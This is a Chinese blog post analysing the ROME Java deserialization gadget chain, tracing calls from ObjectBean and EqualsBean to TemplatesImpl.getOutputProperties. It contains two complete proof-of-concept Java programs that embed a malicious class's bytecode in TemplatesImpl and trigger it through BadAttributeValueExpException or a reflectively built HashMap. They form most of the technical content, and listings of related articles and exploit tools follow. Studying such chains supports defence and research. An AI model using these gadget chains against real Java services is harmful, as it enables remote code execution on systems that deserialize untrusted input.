Java反序列化漏洞-ROME利用链分析

最新推荐文章于 2024-07-11 09:19:22 发布
最新推荐文章于 2024-07-11 09:19:22 发布
阅读量3.4k 收藏
点赞数 1
文章标签: java 后端 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l11III1111/article/details/121717594
版权

直接看到执行getOutputProperties的方法

image-20211204151421618

调用了BeanIntrospector.getPropertyDescriptors(_beanClass)获取_beanClass中的所有的getter和setter方法。其中_beanClass是我们在ObjectBean中传入的一个class类型的对象

image-20211204152322667

具体获取getter和setter方法在getPDs的另一个重载了的方法里面

image-20211204152551440

而我们知道TemplatesImpl的getOutputProperties前面是以get开头的满足这个格式,我们可以用ToStringBean.toString调用到TemplatesImpl的getOutputProperties。接着另一个无参的toString调用了这个有参数的toString

image-20211204153424063

获取_obj类名的prefix然后传入有参数的toString方法

然后看到ObjectBean的toString方法,ObjectBean的toStirng调用了成员变量_toStrinBean的toString方法。

image-20211204153911323

再来看一下ObjectBean的构造方法_toStringBean是如何传入的,_toStringBean我们可控.也就是我们找到readObject中有调用到对象的toString方法。熟悉cc链的同学可能会想到BadAttributeValueExpException。

image-20211204154236199

构造一下poc

package test;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;

import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.syndication.feed.impl.ObjectBean;
import javassist.ClassPool;

import javax.management.BadAttributeValueExpException;
import javax.xml.transform.Templates;

public class ROME {
    public static void main(String[] args) throws Exception{
        //构造恶意TemplatesImpl
        TemplatesImpl templates =new TemplatesImpl();
        SetFieldValue(templates, "_bytecodes", new byte[][]{
            ClassPool.getDefault().get(evil.Evil.class.getName()).toBytecode()
        });
        SetFieldValue(templates, "_name", "HelloTemplatesImpl");
        SetFieldValue(templates, "_tfactory", new TransformerFactoryImpl());

        //构造ObjectBean
        ObjectBean objectBean = new ObjectBean(Templates.class, templates);
        //构造BadAttributeValueExpException
        BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException("lsf");
        //反射将恶意的ObjectBean设置进BadAttributeValueExpException中
        Field field = BadAttributeValueExpException.class.getDeclaredField("val");
        field.setAccessible(true);
        field.set(badAttributeValueExpException,objectBean);

        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream out = new ObjectOutputStream(byteArrayOutputStream);
        out.writeObject(badAttributeValueExpException);
        byte[] sss = byteArrayOutputStream.toByteArray();

        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(sss));
        ois.readObject();
    }

    public static void SetFieldValue(Object obj,String methodName,Object targetObject) throws NoSuchFieldException, IllegalAccessException {
        Field field = obj.getClass().getDeclaredField(methodName);
        field.setAccessible(true);
        field.set(obj,targetObject);
    }
}

这个可能和ysoserial的利用链不太一样,我自己用BadAttributeValueExpException改造了一下。接着来看ysoserial中的ROME利用链。ysoserial一开始使用了HashMap的readObject调用ObjectBean的hashcode。而ObjectBean的hashCode调用了_equalsBean的beadnHashCode。_equalsBean是一个EqualsBean对象,EqualsBean的beanHashCode调用了_obj.toString方法,_obj为我们ObjectBean传入的object对象。这就连接上了上一个链我们只要将_obj设置成刚刚构造的有恶意TemplatesImpl的ObjectBean即可。

image-20211204161030313

构造poc

package test;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Array;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.util.HashMap;

import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.syndication.feed.impl.ObjectBean;
import javassist.ClassPool;

import javax.xml.transform.Templates;

public class ROME {
    public static void main(String[] args) throws Exception{
        //构造TemplatesImpl
        TemplatesImpl templates =new TemplatesImpl();
        SetFieldValue(templates, "_bytecodes", new byte[][]{
            ClassPool.getDefault().get(evil.Evil.class.getName()).toBytecode()
        });
        SetFieldValue(templates, "_name", "HelloTemplatesImpl");
        SetFieldValue(templates, "_tfactory", new TransformerFactoryImpl());

        //objectBean1设置了templates,当调用objectBean1.toString即可执行恶意类
        ObjectBean objectBean1 = new ObjectBean(Templates.class, templates);
        //objectBean2是外层的ObjectBean,当调用到objectBean2.hashcode即可调用到objectBean1.toString
        ObjectBean objectBean2 = new ObjectBean(ObjectBean.class, objectBean1);


        HashMap hashMap = new HashMap();
        hashMap.put(objectBean1,"lsf");

        //通过反射设置HashMap中的值
        Class nodeC = Class.forName("java.util.HashMap$Node");
        Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC);
        nodeCons.setAccessible(true);
        Object tbl = Array.newInstance(nodeC, 1);
        Array.set(tbl, 0, nodeCons.newInstance(0, objectBean2, objectBean2, null));
        Field fieldtable = hashMap.getClass().getDeclaredField("table");
        fieldtable.setAccessible(true);
        fieldtable.set(hashMap,tbl);

        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream out = new ObjectOutputStream(byteArrayOutputStream);
        out.writeObject(hashMap);
        byte[] sss = byteArrayOutputStream.toByteArray();

        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(sss));
        ois.readObject();
    }

    public static void SetFieldValue(Object obj,String methodName,Object targetObject) throws NoSuchFieldException, IllegalAccessException {
        Field field = obj.getClass().getDeclaredField(methodName);
        field.setAccessible(true);
        field.set(obj,targetObject);
    }
}
lu0sf
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[JAVA安全]ROME链复现与分析
qq_42585535的博客
10-12 176
而在初步构造gadget时,我们先入为主地把。这里的ysoserial.Pwner类是yso在生成ROME链的generate payload时注入的恶意字节码,类似于我们自己写的Evil.class。经过了一段时间(折磨了1天)的代码阅读与大量的调试与修改,我把一些没有什么意义的代码精简后,实现了ysoserial payload的动态加载的效果。注意这里的key是ObjectBean@919,在之后反推和构造Gadgat时要用到,后续还会嵌套在其他对象里面,用IDEA给的编号确定对象位置。
rome-1.5.0.jar
08-10
Rome是为RSS聚合而开发的一个框架,让你可以快速的开发基于java的RSS阅读
ROME 反序列化
最新发布
2301_79700060的博客
07-11 672
ROME是主要用于解析RSS和Atom种子的一个Java框架。ROME 是一个可以兼容多种格式的 feeds 解析器,可以从一种格式转换成另一种格式,也可返回指定格式或 Java 对象。ROME 兼容了 RSS (0.90, 0.91, 0.92, 0.93, 0.94, 1.0, 2.0), Atom 0.3 以及 Atom 1.0 feeds 格式。他有个特殊的位置就是ROME提供了ToStringBean这个类,提供深入的toString方法对Java Bean进行操作。
Rome链分析
Sk1y的博客
07-01 607
Rome链分析 ysoserial BadAttributeValueExpException 简化
[Java反序列化]rome反序列化学习
feng的博客
11-09 1283
前言 也算是忙里偷闲了,看了一下午的操作系统感觉自己就是傻子。。。晚上把前段时间的战疫比赛遇到的rome反序列化链给学习了一下,之后应该还是继续课内的学习,除了打打比赛,其他的学习得等到寒假了。 分析 从网上找了利用链: TemplatesImpl.getOutputProperties() NativeMethodAccessorImpl.invoke0(Method, Object, Object[]) NativeMethodAccessorImpl.invoke(Object, Object[])
Rome反序列化
01-22 714
Rome反序列化 Gadget /* * Gadget: * HashMap#readObject * ObjectBean#hashCode * EqualsBean#beanHashCode * ToStringBean#toString * TemplatesImpl#getOutputProperties * */ HashMap#readObject 可以调用到任意一个类的 hashCode 方法,这里调用到的是 Obje
Java安全』反序列化-Rome 1.0反序列化POP链分析_ysoserial Rome payload分析
Ho1aAs‘s Blog
03-08 1911
文章目录前言版本代码审计 | 原理分析1. ToStringBean.toString()触发TemplatesImpl.getOutputProperties()手动调用ToStringBean.toString()示例代码2. EqualsBean.hashCode()触发toString()手动调用EqualsBean.hashCode()示例代码3. ObjectBean触发toString()或hashCode()手动调用ObjectBean.toString()和hashCode()示例代码4.
java反序列化漏洞-验证.rar
06-25
Java反序列化漏洞是软件安全领域的一个重要话题,尤其对于使用Java进行开发的系统来说,理解和防范这种漏洞至关重要。在Java编程中,序列化和反序列化是常见的数据传输和持久化手段,允许对象的状态被转换为字节流,...
Java反序列化漏洞利用工具.zip
04-10
标题"Java反序列化漏洞利用工具.zip"表明该压缩包内包含了针对Java反序列化漏洞利用工具,特别提到了针对JBOSS和WebLogic两个流行的Java应用服务器。JBOSS和WebLogic都是企业级的应用服务器,广泛用于部署各种业务...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic中,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查...
Java反序列化漏洞利用工具V1.7.jar
03-25
Java反序列化漏洞利用工具
rome:用于RSS和Atom提要的Java
05-06
罗马 罗马是用于RSS和Atom提要的Java框架。 该框架包含几个模块: :warning: 由于缺乏积极的维护者,该项目的维护和开发目前受到限制。 考虑成为一个积极的维护者。 项目结构 模块 描述 rome 用于生成和解析RSS和Atom提要的库。 rome-modules MediaRSS,GeoRSS等扩展的生成器和解析器。 rome-opml 解析器和工具。 rome-fetcher 已弃用(有关详细信息,请参见 ) 其他不推荐使用的模块: rome-certiorem , rome-certiorem-webapp和rome-propono 。 例子 解析供稿: String url = " https://stackoverflow.com/feeds/tag?tagnames=rome " ; SyndFeed feed = new SyndFeedInput (
rome:收集优秀文章,编写最佳实践,打造自己的Java知识库
05-28
rome Rome was not built in one day 罗马非一日建成 取名来由 命名rome,源于"Rome was not built in one day",旨在表达如果想提升自己的技能和知识面,并不是一时半会的功夫就能达成,需要日积月累的学习、总结和记录。 项目宗旨 该项目主要包括两部分:参考文章和最佳实践 参考文章 收集日常开发中相关问题的解决方案,在各个子module下的README.md文件中都有相应的文章地址和解决方法,方便查找和翻阅。 最佳实践(持续更新中) 通过module的层级关系编排,目前相应的知识点如下 springboot springboot-demo springboot项目的搭建和运行 springboot项目内置LogBack日志系统的使用 点击 springboot项目如何使用Log4j2 点击 springboot项目集成rabbitm
rome,用于rss和atom提要的java库.zip
10-11
Rome是一个用于RSS和Atom提要的Java框架。框架由几个模块组成:
java中rss解析器(rome.jar和jdom.jar)示例
09-04
主要介绍了java中rss解析器(rome.jar和jdom.jar)示例,需要的朋友可以参考下
Java反序列化漏洞静态分析与动态验证研究与实现
04-10
Java反序列化漏洞中存在利用链, 攻击者通常将其与任意命令漏洞结合控制服务器。人工检测反序列化链需要花费大量的精力, 需要依赖代码审计人员的专业知识。 文章基于污点分析提出 种静态检测和动态验证的方法, ...
java rome,Rome初体验
weixin_32736623的博客
03-13 138
Sina Newsjava.util.Properties systemSettings = System.getProperties();systemSettings.put("http.proxyHost", "mywebcache.com");systemSettings.put("http.proxyPort", "8080");System.setProperties(systemSet...
java rome_Rome使用入门
weixin_39889544的博客
02-16 476
Rome的两种使用方法所需jar包的下载 here,在这里可以找到与rome相关的所有文件1、只使用romepackage com.ivo.rss;import java.io.IOException;import java.net.URL;import java.util.Iterator;import com.sun.syndication.feed.synd.SyndEntry;import...
java rome_JAVA生成RSS订阅--ROME
weixin_39812142的博客
02-12 471
1、什么是RSSRSS(Really Simple Syndication)是一种描述和同步网站内容的格式,是使用最广泛的XML应用。RSS搭建了信息迅速传播的一个技术平台,使得每个人都成为潜在的信息提供者。发布一个RSS文件后,这个RSS Feed中包含的信息就能直接被其他站点调用,而且由于这些数据都是标准的XML格式,所以也能在其他的终端和服务中使用,是一种描述和同步网站内容的格式。2、为什么...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值